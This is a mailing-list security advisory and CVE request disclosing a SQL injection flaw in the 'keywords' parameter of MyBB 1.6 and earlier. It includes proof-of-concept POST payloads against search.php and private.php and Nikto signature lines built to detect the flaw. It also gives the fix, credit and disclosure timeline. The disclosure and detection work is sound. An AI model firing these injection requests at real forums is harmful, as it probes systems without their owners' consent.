oss-sec mailing list archives
CVE Request: MyBB 1.6 <= SQL Injection
From: YGN Ethical Hacker Group <lists () yehg net>
Date: Fri, 18 Mar 2011 14:17:16 +0800
1. OVERVIEW Potential SQL Injection vulnerability was detected in MyBB. 2. APPLICATION DESCRIPTION MyBB is a free bulletin board system software package developed by the MyBB Group. It's supposed to be developed from XMB and DevBB bulletin board applications. 3. VULNERABILITY DESCRIPTION The "keywords" parameter was not properly sanitized in /private.php and /search.php which leads to SQL Injection vulnerability. Full exploitation possibility is probably mitigated by clean_keywords and clean_keywords_ft functions in inc/functions_search.php. 4. VERSIONS AFFECTED MyBB 1.6 and lower 5. PROOF-OF-CONCEPT/EXPLOIT => /search.php POST /mybb/search.php action=do_search&forums=2&keywords='+or+'a'+'a&postthread=1 => /private.php POST /mybb/private.php my_post_key=&keywords='+or+'a'+'a&quick_search=Search+PMs&allbox=Check+All&fromfid=0&fid=4&jumpto=4&action=do_stuff Get nikto check http://trac2.assembla.com/Nikto_2/browser/trunk/plugins/db_tests?rev=588 Or try nikto udb_tests "400000","0","9","/search.php","POST","MyBB has experienced an internal SQL error and cannot continue.","","","Sorry, but no results were returned","","MyBB 1.6 <= SQL Injection, ref: http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection","action=do_search&forums=2&keywords='+or+'a'+'a&postthread=1","" "400001","0","9","/private.php","POST","MyBB has experienced an internal SQL error and cannot continue.","","","Sorry, but no results were returned","","MyBBx 1.6 <= SQL Injection, ref: http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection","my_post_key=&keywords='+or+'a'+'a&quick_search=Search+PMs&allbox=Check+All&fromfid=0&fid=4&jumpto=4&action=do_stuff","" 6. SOLUTION Upgrade to 1.6.1 7. VENDOR MyBB Development Team http://www.mybb.com/ 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2010-12-09: notified vendor 2010-12-15: vendor released fixed version 2010-12-24: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection About MyBB: http://www.mybb.com/about/mybb #yehg [2010-12-24] --------------------------------- Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd
Current thread:
- CVE Request: MyBB 1.6 <= SQL Injection YGN Ethical Hacker Group (Mar 18)